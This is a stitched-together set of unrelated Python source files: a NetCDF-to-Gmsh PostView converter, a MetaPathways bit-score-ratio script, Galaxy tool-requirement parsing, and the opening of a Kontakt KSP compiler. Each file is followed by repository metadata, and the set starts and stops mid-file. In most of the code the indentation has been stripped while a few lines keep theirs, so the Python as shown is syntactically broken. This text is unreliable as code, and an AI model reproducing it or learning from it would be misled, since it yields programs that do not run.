print "done :" + str(strftime("%Y-%m-%d %H:%M:%S", gmtime()))
timePassed = datetime.datetime.now() - posTime
print "Time :" + str(timePassed.seconds) + " seconds."
# Lon-lat.
def _read_nc( self ):
lon = self.fnc.variables['lon'][:]
lat = self.fnc.variables['lat'][:]
field = self.fnc.variables['z'][:, :]
field = abs(where(field == 0, 0.1, field))
self.x0 = outer(ones_like(lat),lon).flatten()#may not be the most efficient way of calling this
self.x1 = outer(lat, ones_like(lon)).flatten()
self.phi = field.flatten()
# X/Y range.
def _read_nc_xyrange( self ): #still does not seem to be working
xs = self.fnc.variables['x_range']
ys = self.fnc.variables['y_range']
space = self.fnc.variables['dimension']
field = self.fnc.variables['z']
field = abs(where(field == 0, 0.1, field))
xList = linspace(xs[0], xs[1], space[0])
yList = linspace(ys[0], ys[1], space[1])
self.x0 = outer(ones_like(yList),xList).flatten()
self.x1 = outer(yList, ones_like(xList)).transpose().flatten()
self.phi = field
# X-Y.
def _read_nc_xy( self ):
x = self.fnc.variables['x'][:]
y = self.fnc.variables['y'][:]
field = self.fnc.variables['z'][:, :]
field = abs(where(field == 0, 0.1, field))
self.x0 = outer(ones_like(y),x).flatten()
self.x1 = outer(y, ones_like(x)).flatten()
self.phi = field.flatten()
def _writeFunc( self ):
f = open(str(self.postviewFileName),'w')
f.write("""View "background_edgelength" {\n""")
self._writeLines(f,self.x0,self.x1,self.phi)
f.write('};')
f.close()
_writeLines = vectorize(lambda f, x, y, z: f.write("SP("+str(x)+","+str(y)+",0){"+str(z)+"};\n"))
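    # Each emitted record appears to be a Gmsh/PostView scalar-point entry of
    # the form SP(x, y, 0){value};, one per grid node, wrapped in the View
    # block opened in _writeFunc above.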
    def writePosFile( self ): # find some algorithm to decide what to return for the 0 value
print "Writing PostView File..."
# Check the file variables so that the appropriate function can be called.
self.fnc = NetCDF.NetCDFFile(str(self.singleNetCDFLayerFileName), 'r')
variableNames = self.fnc.variables.keys()
if 'lon' in variableNames:
self._read_nc()
elif 'x_range' in variableNames:
self._read_nc_xyrange()
elif 'x' in variableNames:
self._read_nc_xy()
else:
            raise UnsupportedRasterVariableError(str(variableNames))
self._writeFunc()
print "PostView File Written."
if __name__ == '__main__':
import sys
if len(sys.argv) == 1:
arg = os.path.realpath(__name__)[:-8]
else:
arg = sys.argv[1]
converter().wholeDirect(str(arg))
|
janhui/test_engine
|
dev/StandAloneScripts/PosFileConverter.py
|
Python
|
lgpl-2.1
| 3,478
|
[
"NetCDF"
] |
f3a715437643bdb53ee928b4d9081400d5974dae0c8026a1612b8180378dae8c
|
#!/usr/bin/python
# File created on 27 Jan 2012.
from __future__ import division
__author__ = "Kishori M Konwar"
__copyright__ = "Copyright 2013, MetaPathways"
__credits__ = ["r"]
__version__ = "1.0"
__maintainer__ = "Kishori M Konwar"
__status__ = "Release"
try:
import os, re, traceback
from os import makedirs, sys, remove, rename
from sys import path
from optparse import OptionParser
from libs.python_modules.utils.metapathways_utils import parse_command_line_parameters, fprintf, ShortenORFId
from libs.python_modules.utils.sysutil import getstatusoutput, pathDelim
from libs.python_modules.utils.errorcodes import error_message, get_error_list, insert_error
except:
print(""" Could not load some user defined module functions""")
print(""" Make sure your typed 'source MetaPathwaysrc'""")
print(""" """)
sys.exit(3)
PATHDELIM = pathDelim()
usage = __file__ + """ -i input_fasta_file -o output_file """
parser = None
def createParser():
global parser
epilog = """The amino acid sequences in the orf_prediction folder are used to do a self alignment, which will be used to compute the bit score ratio (BSR) for the hits. The BSR ratio can be defined at the ratio of a the bit-score between a query and a target sequence to the bitcore when both the query and target sequenes are the query sequence. Usually, a BSR ratio of 0.4 or more is considered as a good hit for protein sequences. Note that BSR ratio is designed in some sense to have a normalized value for the bit-score since the score is also influenced by the length of the query.
The results are written to a file (usually in a folder called blast_results in the MetaPathway pipeline, into a file named <samplename>.refscore.<algorithm> (where <algorithm> refers to the BLAST or LAST in the context of the pipeline) extension This script can be extended to add other sequence homology search algorithms."""
epilog = re.sub(r'[ \t\f\v]+',' ', epilog)
parser = OptionParser(usage=usage, epilog=epilog)
parser.add_option("-i", "--input_file", dest="input_fasta",
help='the input fasta file [REQUIRED]')
parser.add_option("-o", "--output_file", dest="output_file",
help='the output fasta file [REQUIRED]')
parser.add_option("-a", "--algorithm", dest="algorithm", choices = ['BLAST', 'LAST'], default = "BLAST",
help='the algorithm used for computing homology [DEFAULT: BLAST]')
parser.add_option( "--compact_output", dest="compact_output", action='store_true', default=False,
help='compact output [OPTIONAL]')
def check_arguments(opts, args):
if opts.input_fasta == None or opts.output_file == None:
return True
else:
return False
class FastaRecord(object):
def __init__(self, name, sequence):
self.name = name
self.sequence = sequence
# return FastaRecord(title, sequence)
class FastaReader():
"""Parses a fasta record from a string or file."""
stop = False
START_PATTERN = re.compile(r'^>')
name = None
future_name =None
sequence=""
def __init__(self, fasta_filename):
try:
self.file = open(fasta_filename, 'r')
except IOError:
print("Cannot open fasta file " + fasta_filename)
def __iter__(self):
return self
def close(self):
self.file.close()
def __next__(self):
if self.stop:
raise StopIteration
try:
if not self.name:
self.name = self.file.readline().strip()
line = self.file.readline()
except:
line = None
if not line:
self.stop = True
raise StopIteration
fragments = []
while line and not self.START_PATTERN.search(line):
fragments.append(line.strip())
line = self.file.readline()
# print line
if self.future_name:
self.name = re.sub('>','',self.future_name)
if line:
self.future_name = line.strip()
self.sequence =''.join(fragments)
self.seqname = self.name
return FastaRecord( re.sub('>', '', self.name), self.sequence)
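# Illustrative usage of FastaReader (hypothetical file name):
#   for record in FastaReader("orfs.faa"):
#       print(record.name, len(record.sequence))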
def format_db_blast(formatdb_executable, seq_subset_file):
cmd='%s -dbtype prot -in %s' %(formatdb_executable, seq_subset_file.name)
result= getstatusoutput(cmd)
def format_db_last(formatdb_executable, seq_subset_file):
dirname = os.path.dirname(seq_subset_file.name)
cmd='%s -p -c %s %s' %(formatdb_executable, dirname + PATHDELIM + 'subset_db', seq_subset_file.name)
result= getstatusoutput(cmd)
def blast_against_itself(blast_executable, seq_subset_file, blast_table_out):
cmd='%s -outfmt 6 -db %s -query %s -out %s' %(blast_executable, seq_subset_file.name, seq_subset_file.name, blast_table_out)
result= getstatusoutput(cmd)
def last_against_itself(last_executable, seq_subset_file, last_table_out):
dirname = os.path.dirname(seq_subset_file.name)
cmd='%s -o %s -f 0 %s %s' %(last_executable, last_table_out, dirname + PATHDELIM + 'subset_db', seq_subset_file.name)
result= getstatusoutput(cmd)
def add_last_refscore_to_file(blast_table_out, refscore_file, allNames):
commentPATTERN = re.compile(r'^#')
infile = open( blast_table_out,'r')
refscores = {}
lines = infile.readlines()
for line in lines:
if commentPATTERN.match(line):
continue
line=line.rstrip()
fields = line.split('\t')
if len(fields) != 12:
print('Error in the blastout file')
sys.exit(1)
if fields[6].rstrip()==fields[1].rstrip():
# fprintf(refscore_file, "%s\t%s\n",fields[0], fields[11])
refscores[fields[1]]=fields[0]
for key, value in refscores.items():
allNames[key] = True
fprintf(refscore_file, "%s\t%s\n",key, value)
infile.close()
def add_blast_refscore_to_file(blast_table_out, refscore_file, allNames):
infile = open( blast_table_out,'r')
refscores = {}
lines = infile.readlines()
for line in lines:
line=line.rstrip()
fields = line.split('\t')
if len(fields) != 12:
print('Error in the blastout file')
sys.exit(1)
if fields[0].rstrip()==fields[1].rstrip():
# fprintf(refscore_file, "%s\t%s\n",fields[0], fields[11])
refscores[fields[0]]=fields[11]
for key, value in refscores.items():
allNames[key] = True
fprintf(refscore_file, "%s\t%s\n",key, value)
infile.close()
# write the refscores
def write_refscores(refscore_file, refscores, compact_output=False):
for key, value in refscores.items():
orfid = key
if compact_output:
orfid = ShortenORFId(key)
fprintf(refscore_file, "%s\t%s\n",orfid, value)
SCORES= {
'A': 4,
'R': 5,
'N': 6,
'D': 6,
'C': 9,
'Q': 5,
'E': 5,
'G': 6,
'H': 8,
'I': 4,
'L': 4,
'K': 5,
'M': 5,
'F': 6,
'P': 7 ,
'S': 4 ,
'T': 5 ,
'W': 11,
'Y': 7 ,
'V': 4,
'B': 4,
'J': 3,
'Z': 4,
'X': -1,
'*': 1,
}
def getrefscore(seq):
score =0
for c in seq:
        try:
            score += SCORES[c]
        except KeyError:
            pass  # skip characters without a defined score (do not reset the total)
return score
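# Illustrative note (example values, not part of the pipeline output): the BSR
# of a hit is its bit-score divided by the query's self-score as approximated
# above, e.g.
#   self_score = getrefscore("MKT")         # 5 + 5 + 5 = 15
#   bsr = hit_bitscore / self_score         # >= 0.4 usually marks a good hit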
def compute_refscores(sequences_subset, refscore_file, compact_output=False):
refscores ={}
for key, value in sequences_subset.items():
refscores[key] = getrefscore(value)
write_refscores(refscore_file, refscores, compact_output=compact_output)
# compute the refscores
def _old_compute_refscores(formatdb_executable, blast_executable,seq_subset_file, refscore_file, allNames, algorithm):
if algorithm =='LAST':
format_db_last(formatdb_executable, seq_subset_file)
last_table_out = seq_subset_file.name + ".lastout"
last_against_itself(blast_executable, seq_subset_file, last_table_out)
add_last_refscore_to_file(last_table_out,refscore_file, allNames)
if algorithm =='BLAST':
format_db_blast(formatdb_executable, seq_subset_file)
blast_table_out = seq_subset_file.name + ".blastout"
blast_against_itself(blast_executable, seq_subset_file, blast_table_out)
add_blast_refscore_to_file(blast_table_out,refscore_file, allNames)
return None
def remove_blast_index_files(filename):
prefixes = [ 'blastout', 'phr', 'pin', 'psq' ]
for prefix in prefixes:
try:
remove(filename +"." + prefix)
except IOError:
pass
def remove_last_index_files(filename):
suffixes = [ 'prj', 'des', 'sds', 'suf', 'bck', 'ssp', 'tis' ]
remove( filename+ '.lastout')
dirname = os.path.dirname(filename)
for suffix in suffixes:
try:
remove(dirname + PATHDELIM + 'subset_db.' + suffix)
except IOError:
pass
# the main function
SIZE = 10000
def main(argv, errorlogger = None, runstatslogger = None):
global parser
(opts, args) = parser.parse_args(argv)
if check_arguments(opts, args):
print(usage)
sys.exit(0)
input_fasta = opts.input_fasta
output_file = opts.output_file
algorithm = opts.algorithm
compact_output= opts.compact_output
    # the input file is aligned against itself to compute refscores
    # the output file will hold the refscores for the entire input
outfile = open(output_file + ".tmp", 'w')
count = 0
allNames= dict()
sequence_subset = dict()
refscores = dict()
fastaReader = FastaReader(input_fasta)
for record in fastaReader:
count = count + 1
sequence_subset[record.name] = record.sequence
if count % SIZE == 0:
compute_refscores(sequence_subset, outfile, compact_output=compact_output)
count = 0
sequence_subset = dict()
if count % SIZE != 0:
compute_refscores(sequence_subset, outfile, compact_output=compact_output)
sequence_subset = dict()
#print count
fastaReader.close()
outfile.close()
rename(output_file + ".tmp", output_file)
def MetaPathways_refscore(argv, errorlogger = None, runstatslogger = None):
createParser( )
if errorlogger:
errorlogger.write("#STEP\tCOMPUTE_REFSCORE\n")
try:
main(argv, errorlogger = errorlogger, runstatslogger = runstatslogger)
except:
insert_error(15)
return (0,traceback.format_exc(10))
return (0,'')
# the main function of metapaths
if __name__ == "__main__":
createParser()
main(sys.argv[1:])
|
kishori82/MetaPathways_Python.3.0
|
libs/python_scripts/MetaPathways_refscore.py
|
Python
|
mit
| 11,218
|
[
"BLAST"
] |
8010793efbf5f852a9b1e82df941ea2b5c4fbe9a85bc61cef8a343be67ce312b
|
from galaxy.util import xml_text
DEFAULT_REQUIREMENT_TYPE = "package"
DEFAULT_REQUIREMENT_VERSION = None
class ToolRequirement( object ):
"""
Represents an external requirement that must be available for the tool to
run (for example, a program, package, or library). Requirements can
optionally assert a specific version.
"""
def __init__( self, name=None, type=None, version=None ):
self.name = name
self.type = type
self.version = version
def to_dict( self ):
return dict(name=self.name, type=self.type, version=self.version)
@staticmethod
def from_dict( dict ):
version = dict.get( "version", None )
name = dict.get("name", None)
type = dict.get("type", None)
return ToolRequirement( name=name, type=type, version=version )
DEFAULT_CONTAINER_TYPE = "docker"
class ContainerDescription( object ):
def __init__( self, identifier=None, type="docker" ):
self.identifier = identifier
self.type = type
def to_dict( self ):
return dict(identifier=self.identifier, type=self.type)
@staticmethod
def from_dict( dict ):
identifier = dict["identifier"]
type = dict.get("type", DEFAULT_CONTAINER_TYPE)
return ContainerDescription( identifier=identifier, type=type )
def parse_requirements_from_dict( root_dict ):
requirements = root_dict.get("requirements", [])
containers = root_dict.get("containers", [])
return map(ToolRequirement.from_dict, requirements), map(ContainerDescription.from_dict, containers)
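# Illustrative usage (hypothetical input dict, mirroring the doctests below):
#   reqs, containers = parse_requirements_from_dict(
#       {"requirements": [{"name": "bwa", "type": "package"}]})
#   reqs[0].name  # -> 'bwa'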
def parse_requirements_from_xml( xml_root ):
"""
>>> from xml.etree import ElementTree
>>> def load_requirements( contents ):
... contents_document = '''<tool><requirements>%s</requirements></tool>'''
... root = ElementTree.fromstring( contents_document % contents )
... return parse_requirements_from_xml( root )
>>> reqs, containers = load_requirements('''<requirement>bwa</requirement>''')
>>> reqs[0].name
'bwa'
>>> reqs[0].version is None
True
>>> reqs[0].type
'package'
>>> reqs, containers = load_requirements('''<requirement type="binary" version="1.3.3">cufflinks</requirement>''')
>>> reqs[0].name
'cufflinks'
>>> reqs[0].version
'1.3.3'
>>> reqs[0].type
'binary'
"""
requirements_elem = xml_root.find( "requirements" )
requirement_elems = []
if requirements_elem is not None:
requirement_elems = requirements_elem.findall( 'requirement' )
requirements = []
for requirement_elem in requirement_elems:
name = xml_text( requirement_elem )
type = requirement_elem.get( "type", DEFAULT_REQUIREMENT_TYPE )
version = requirement_elem.get( "version", DEFAULT_REQUIREMENT_VERSION )
requirement = ToolRequirement( name=name, type=type, version=version )
requirements.append( requirement )
container_elems = []
if requirements_elem is not None:
container_elems = requirements_elem.findall( 'container' )
containers = []
for container_elem in container_elems:
identifier = xml_text( container_elem )
type = container_elem.get( "type", DEFAULT_CONTAINER_TYPE )
container = ContainerDescription( identifier=identifier, type=type )
containers.append( container )
return requirements, containers
|
ssorgatem/pulsar
|
galaxy/tools/deps/requirements.py
|
Python
|
apache-2.0
| 3,413
|
[
"BWA",
"Galaxy"
] |
020de31c8c31142d12ec6e5e14201b947c3d55213a647d7efa07a7ece5b88b71
|
# ksp-compiler - a compiler for the Kontakt script language
# Copyright (C) 2011 Nils Liberg
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version:
# http://www.gnu.org/licenses/gpl-2.0.html
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
import re
import os
import copy
import collections
from collections import OrderedDict
import ksp_ast
import ksp_ast_processing
from ksp_compiler_extras import flatten
import ksp_compiler_extras as comp_extras
import ksp_builtins
from ksp_parser import parse
from taskfunc import taskfunc_code
import hashlib
import ply.lex as lex
# NOTE(Sam): include preprocessor and logger
from logger import logger_code
import time
from preprocessor_plugins import pre_macro_functions, macro_iter_functions, post_macro_functions
import json
variable_prefixes = '$%@!?~'
# regular expressions:
white_space = r'(?ms)(\s*(\{[^\n]*?\})?\s*)' # regexp for normal white space/comments
comment_re = re.compile(r'(?<!["\'])\{.*?\}|\(\*.*?\*\)|/\*.*?\*/', re.DOTALL) # if { is preceded by ' or " don't treat it as a comment
string_re = re.compile(r'".*?(?<!\\)"|' + r"'.*?(?<!\\)'")
line_continuation_re = re.compile(r'\.\.\.\s*\n', re.MULTILINE)
placeholder_re = re.compile(r'\[\[\[\d+\]\]\]')
varname_re = re.compile(r'((\b|[$%!@~?])[0-9]*[a-zA-Z_][a-zA-Z0-9_]*(\.[a-zA-Z_0-9]+)*)\b')
varname_dot_re = re.compile(r'(?<![$%!@~?])\b[0-9]*[a-zA-Z_][a-zA-Z0-9_]*?\.')
import_basic_re = re.compile(r'^\s*import ')
import_re = re.compile(r'^\s*import\s+"(?P<filename>.+?)"(\s+as\s(?P<asname>[a-zA-Z_][a-zA-Z0-9_.]*))?%s$' % white_space)
macro_start_re = re.compile(r'^\s*macro(?=\W)')
macro_end_re = re.compile(r'^\s*end\s+macro')
placeholders = {} # mapping from placeholder number to contents (placeholders used for comments, strings and ...)
functions = OrderedDict() # maps from function name to AST node corresponding to the function definition
variables = set() # a set of the names of the declared variables (prefixed with $, %, !, ? or @)
ui_variables = set() # a set of the names of the declared variables of UI type, like ui_knob, ui_value_edit, etc. (prefixed with $, %, !, ? or @)
families = set() # a set of the family names (prefixed with namespaces)
properties = set()
functions_invoking_wait = set()
true_conditions = set() # the conditions set using SET_CONDITION
called_functions = set() # functions that are somewhere in the script invoked using the Kontakt 4.1 "call" keyword
call_graph = collections.defaultdict(list) # an item (a, b) is included if function a invokes function b using the "call" keyword
def init_globals():
variables.clear()
ui_variables.clear()
functions.clear()
placeholders.clear()
families.clear()
properties.clear()
functions_invoking_wait.clear()
true_conditions.clear()
called_functions.clear()
call_graph.clear()
# simple class to work-around the problem that cStringIO cannot handle certain unicode input
class StringIO:
def __init__(self):
self.parts = []
def write(self, s):
self.parts.append(s)
def getvalue(self):
return ''.join(self.parts)
def prefix_with_ns(name, namespaces, function_parameter_names=None, force_prefixing=False):
if not namespaces:
return name
function_parameter_names = function_parameter_names or []
##name = name.replace('.', '__') # replace . by __
if name[0] in variable_prefixes:
prefix, unprefixed_name = name[0], name[1:]
else:
prefix, unprefixed_name = '', name
    # if the name consists of multiple parts (eg. myfamily.myvariable), extract the first part (myfamily in this example)
first_name_part = name.split('.')[0]
# if built-in name or function parameter
if (unprefixed_name in ksp_builtins.variables_unprefixed or
name in ksp_builtins.functions or
name in ksp_builtins.keywords or
first_name_part in function_parameter_names) and not force_prefixing:
return name # don't add prefix
# add namespace to name
return prefix + '.'.join(namespaces + [unprefixed_name])
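# e.g. prefix_with_ns('$x', ['lib']) -> '$lib.x', while built-in names and
# function parameter names pass through unchanged (unless force_prefixing).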
def prefix_ID_with_ns(id, namespaces, function_parameter_names=None, force_prefixing=False):
if namespaces:
return ksp_ast.ID(id.lexinfo, identifier=prefix_with_ns(str(id), namespaces, function_parameter_names, force_prefixing))
else:
return id
def split_args(arg_string, line):
""" converts eg. "x, y*(1+z), z" into a list ['x', 'y*(1+z)', 'z'] """
if arg_string.strip() == '':
return []
args = []
cur_arg = ''
unmatched_left_paren = 0
double_quote_on = False
for idx, ch in enumerate(arg_string + ','): # extra ',' to include the last argument
# square brackets are also checked as there may be commas in them (for properties/2D arrays)
        if ch == '\"' and (idx == 0 or arg_string[idx - 1] != '\\'):
double_quote_on = not double_quote_on
elif ch in ['(', '[']:
unmatched_left_paren += 1
elif ch in [')', ']']:
unmatched_left_paren -= 1
if ch == ',' and unmatched_left_paren == 0 and not double_quote_on:
cur_arg = cur_arg.strip()
if not cur_arg:
raise ParseException(line, 'Syntax error - empty argument in function call: %s' % arg_string)
args.append(cur_arg)
cur_arg = ''
else:
cur_arg += ch
if unmatched_left_paren:
raise ParseException(line, 'Error - unmatched parenthesis in function call: %s' % arg_string)
return args
class ExceptionWithMessage(Exception):
_message = None
def _get_message(self):
return self._message
def _set_message(self, value):
self._message = value
message = property(_get_message, _set_message)
class ParseException(ExceptionWithMessage):
def __init__(self, line, message):
assert(isinstance(line, Line))
msg = "%s\n%s\n\n%s" % (message, str(line).strip(), line.get_locations_string())
Exception.__init__(self, msg)
self.line = line
self.message = msg
class Line:
def __init__(self, s, locations=None, namespaces=None):
# locations should be a list of (filename, lineno) tuples
self.command = s
self.locations = locations or [(None, -1)]
self.namespaces = namespaces or [] # a list of the namespaces (each import appends the as-name onto the stack)
def get_lineno(self):
return self.locations[0][1]
lineno = property(get_lineno)
def get_filename(self):
return self.locations[0][0]
filename = property(get_filename)
def get_locations_string(self):
return '\n'.join(
('%s%s:%d \r\n' % (' ' * (i * 4), filename or '<main script>', lineno)) for (i, (filename, lineno)) in enumerate(reversed(self.locations)))
def copy(self, new_command=None, add_location=None):
""" returns a copy of the line.
If the new_command parameter is specified that will be the command of the new line
and it will get the same indentation as the old line. """
line = Line(self.command, self.locations, self.namespaces)
if add_location:
line.locations = line.locations + [add_location]
if new_command:
line.command = new_command
return line
def substitute_names(self, name_subst_dict):
if not name_subst_dict:
return self
def repl_func(match):
n = match.group(0)
if n.endswith('.'):
suffix = '.'
n = n[:-1]
else:
suffix = ''
if n in name_subst_dict:
return name_subst_dict[n] + suffix
else:
return n + suffix
s = varname_re.sub(repl_func, self.command)
s = varname_dot_re.sub(repl_func, s)
return self.copy(new_command=s)
def replace_placeholders(self):
replace_func = lambda matchobj: placeholders[int(matchobj.group(1))]
self.command = re.sub(r'\{(\d+?)\}', replace_func, self.command)
def __str__(self):
return self.command
def __repr__(self):
return self.command
class Macro:
def __init__(self, lines):
self.lines = lines
self.name, self.parameters = self.get_macro_name_and_parameters()
def get_name_prefixed_by_namespace(self):
return prefix_with_ns(self.name, self.lines[0].namespaces)
def get_macro_name_and_parameters(self):
""" returns the function name, parameter list, and result variable (or None) as a tuple """
param = white_space + r'([$%@!?~]?[\w\.]+|#[\w\.]+#)' + white_space
params = r'%s(,%s)*' % (param, param)
m = re.match(r'^\s*macro\s+(?P<name>[a-zA-Z0-9_]+(\.[a-zA-Z_0-9.]+)*)\s*(?P<params>\(%s\))?' % params, self.lines[0].command)
if not m:
raise ParseException(self.lines[0], "Syntax error in macro declaration")
name = m.group('name')
params = m.group('params') or []
if params:
params = params[1:-1] # strip parenthesis
params = re.sub(white_space, '', params) # strip whitespace (eg. comments)
params = [x.strip() for x in params.split(',')]
return (name, params)
def copy(self, lines=None, add_location=None):
if lines is None:
lines = self.lines[:]
return Macro([l.copy(add_location=add_location) for l in lines])
def substitute_names(self, name_subst_dict):
""" returns a copy of the block with the specified name substitutions made """
new_macro = self.copy(lines=[line.substitute_names(name_subst_dict) for line in self.lines])
for line in new_macro.lines:
line.replace_placeholders()
# handle raw replacements (arguments like #var# should be substituted irrespectively of context)
for name1, name2 in list(name_subst_dict.items()):
if name1.startswith('#'):
for line in new_macro.lines:
line.command = line.command.replace(name1, name2)
return new_macro
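# Note on macro substitution (illustrative): expanding a call "mymacro(5)"
# against "macro mymacro(x)" replaces whole-name occurrences of x with 5,
# while parameters written as #x# are replaced textually everywhere.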
def merge_lines(lines):
""" converts a list of Line objects to a source code string """
return '\n'.join([line.command for line in lines])
def parse_lines(s, filename=None, namespaces=None):
""" converts a source code string to a list of Line objects """
if namespaces is None:
namespaces = []
def replace_func(match):
# replace the match with a placeholder (eg. "{8}") and store the replaced string
i = len(placeholders)
s = match.group(0)
s = placeholder_re.sub('', s) # strip encoded line numbers (for multiline comments)
if s and s[0] == "'": # convert single quotes (') to double quotes (")
s = '"%s"' % s[1:-1].replace(r"\'", "'")
placeholders[i] = s
return '{%d}' % i
lines = s.replace('\r\n', '\n').replace('\r', '\n').split('\n')
    # encode line numbers as '[[[lineno]]]' at the beginning of each line
lines = ['[[[%.5d]]]%s' % (lineno+1, x) for (lineno, x) in enumerate(lines)]
s = '\n'.join(lines)
# remove comments and multi-line indicators ('...\n')
s = comment_re.sub('', s)
lines = s.split('\n')
    # NOTE(Sam): Remove any occurrences of the new comment type //
for i in range(len(lines)):
m = re.search(r"^(?:(?!\/\/|[\"\']).|[\"\'][^\"\']*[\"\'])*(\/\/.*$)", lines[i])
if m:
lines[i] = lines[i].replace(m.group(1), "")
s = '\n'.join(lines)
s = line_continuation_re.sub('', s)
# substitute strings with place-holders
s = string_re.sub(replace_func, s)
# construct Line objects by extracting the line number and line parts
lines = []
for line in s.split('\n'):
lineno, line = int(line[3:3+5]), line[3+5+3:]
line = placeholder_re.sub('', line)
lines.append(Line(line, [(filename, lineno)], namespaces))
return collections.deque(lines)
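# At this point strings and comments have been replaced by numbered
# placeholders such as "{3}" (restored later via Line.replace_placeholders),
# and each Line carries its original (filename, lineno) location.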
def parse_lines_and_handle_imports(code, filename=None, namespaces=None, read_file_function=None, preprocessor_func=None):
""" reads one block from the lines deque """
if preprocessor_func:
code = preprocessor_func(code, namespaces)
lines = parse_lines(code, filename, namespaces)
new_lines = collections.deque()
while lines:
line = lines.popleft()
# if line seems to be an import line
if import_basic_re.match(line.command):
line.replace_placeholders()
# check if it matches a more elaborate syntax
m = import_re.match(str(line))
if not m:
raise ParseException(line, "Syntax error in import statement.")
# load the code in the given file
filename = m.group('filename')
namespace = m.group('asname')
try:
code = read_file_function(filename)
except IOError:
raise ParseException(line, "File does not exist or could not be read: '%s' \n(try saving the files before compiling to get relative search paths right)." % filename)
# parse code and add an extra namespace if applicable
namespaces = line.namespaces
if namespace:
namespaces = namespaces + [namespace]
if preprocessor_func:
code = preprocessor_func(code, namespaces)
new_lines.extend(parse_lines_and_handle_imports(code, filename, namespaces, read_file_function))
# non-import line so just add it to result line list:
else:
new_lines.append(line)
return new_lines
def handle_conditional_lines(lines):
''' handle SET_CONDITION, RESET_CONDITION, USE_CODE_IF and USE_CODE_IF_NOT '''
use_code_conds = []
false_index = -1
for line_obj in lines:
line = line_obj.command
ls_line = line.lstrip()
        clear_this_line = false_index + 1  # truthy iff inside a section disabled by USE_CODE_IF/USE_CODE_IF_NOT
if 'END_USE_CODE' in line:
if use_code_conds.pop() == False and len(use_code_conds) == false_index:
false_index = -1
clear_this_line = True
if not clear_this_line and 'SET_CONDITION(' in line:
m = re.search('\((.+?)\)', line)
if m:
cond = m.group(1).strip()
if line.lstrip().startswith('SET_CONDITION('):
true_conditions.add(cond)
if not cond.startswith('NO_SYS'): # if it starts with NO_SYS, then leave it in the code
clear_this_line = True
elif line.lstrip().startswith('RESET_CONDITION('):
if cond in true_conditions:
true_conditions.remove(cond)
if not cond.startswith('NO_SYS'): # if it starts with NO_SYS, then leave it in the code
clear_this_line = True
if 'USE_CODE_IF' in line:
m = re.search('\((.+?)\)', line)
if m:
cond = m.group(1).strip()
if line.lstrip().startswith('USE_CODE_IF('):
if false_index == -1 and cond not in true_conditions:
false_index = len(use_code_conds)
use_code_conds.append(cond in true_conditions)
clear_this_line = True
elif line.lstrip().startswith('USE_CODE_IF_NOT('):
if false_index == -1 and cond in true_conditions:
false_index = len(use_code_conds)
use_code_conds.append(cond not in true_conditions)
clear_this_line = True
if clear_this_line:
line_obj.command = re.sub(r'[^\r\n]', '', line)
def extract_macros(lines_deque):
''' returns (cleaned_lines, macros) '''
macros = []
lines = lines_deque
cleaned_lines = []
while lines:
line = lines.popleft()
# if macro definition found, read lines up until the next "end macro"
if macro_start_re.match(line.command):
found_end = False
macro_lines = [line]
while lines:
line = lines.popleft()
macro_lines.append(line)
if macro_end_re.match(line.command):
found_end = True
break
if macro_start_re.match(line.command):
raise ParseException(line, "Macro definitions may not be nested (maybe you forgot an 'end macro' line earlier).")
if not found_end:
raise ParseException(macro_lines[0], "Did not find a corresponding 'end macro'.")
macros.append(Macro(macro_lines))
# else if line outside of macro definition
else:
cleaned_lines.append(line)
return (cleaned_lines, macros)
def extract_callback_lines(lines):
''' returns (normal_lines, callback_lines) '''
normal_lines = []
callback_lines = []
inside_callback = False
for line in lines:
if re.match(r'\s*on\s+(ui_control) *\(', line.command):
inside_callback = True
callback_lines.append(line)
elif re.match(r'\s*end on\b', line.command):
inside_callback = False
callback_lines.append(line)
else:
# are we currently inside a callback or not?
if inside_callback:
callback_lines.append(line)
else:
normal_lines.append(line)
return (normal_lines, callback_lines)
def expand_macros(lines, macros, level=0):
    ''' Inline macro invocations, replacing them by the body of the macro definition (with parameters substituted).
    Returns a tuple (normal_lines, callback_lines) where the latter contains the callback lines. '''
macro_call_re = re.compile(r'^\s*([\w_.]+)\s*(\(.*\))?%s$' % white_space)
name2macro = {}
for m in macros:
name = m.get_name_prefixed_by_namespace()
if not (name == 'tcm.init' and name in name2macro):
name2macro[name] = m
#name2macro = dict([(m.get_name_prefixed_by_namespace(), m) for m in macros])
orig_lines = lines
lines = collections.deque(orig_lines)
new_lines = []
new_callback_lines = []
num_substitutions = 0
while lines:
line = lines.popleft()
new_lines.append(line)
m = macro_call_re.match(line.command)
if m:
macro_name, args = m.group(1), m.group(2)
macro_name = prefix_with_ns(macro_name, line.namespaces)
if macro_name in name2macro:
new_lines.pop()
macro = name2macro[macro_name]
if args:
args = split_args(args[1:-1], line)
else:
args = []
# verify that the parameter count is correct
if len(macro.parameters) != len(args):
raise ParseException(line, "Wrong number of parameters. Expected %d, got %d." % (len(macro.parameters), len(args)))
if level > 40:
raise ParseException(line, "This macro seems to be invoking itself recursively")
# build a substitution mapping parameters to arguments, and substitute
name_subst_dict = dict(list(zip(macro.parameters, args)))
macro = macro.copy(add_location=line.locations[0])
macro = macro.substitute_names(name_subst_dict)
# add macro body
if args:
macro_call_str = '%s(%s)' % (macro_name, ', '.join([re.sub(white_space, '', a).strip() for a in args]))
else:
macro_call_str = '%s' % (macro_name)
macro_call_str = re.sub(white_space, '', macro_call_str) # erase any inner comments to not disturb outer
normal_lines, callback_lines = extract_callback_lines(macro.lines[1:-1])
new_lines.extend(normal_lines)
new_callback_lines.extend(callback_lines)
num_substitutions += 1
if num_substitutions:
return expand_macros(new_lines + new_callback_lines, macros, level+1)
else:
return (new_lines, new_callback_lines)
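# expand_macros re-runs itself until a pass makes no substitutions, so macros
# may invoke other macros; the level counter caps recursive expansion depth.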
class ASTModifierBase(ksp_ast_processing.ASTModifier):
def __init__(self, modify_expressions=False):
ksp_ast_processing.ASTModifier.__init__(self, modify_expressions=modify_expressions)
def modifyFunctionCall(self, node, *args, **kwargs):
# there are some functions/preprocessor directives for which the first parameter should always be left as is
if node.function_name.identifier in ['SET_CONDITION', 'RESET_CONDITION', 'USE_CODE_IF', 'USE_CODE_IF_NOT',
'_pgs_create_key', '_pgs_key_exists', '_pgs_set_key_val', '_pgs_get_key_val',
'pgs_create_key', 'pgs_key_exists', 'pgs_set_key_val', 'pgs_get_key_val',
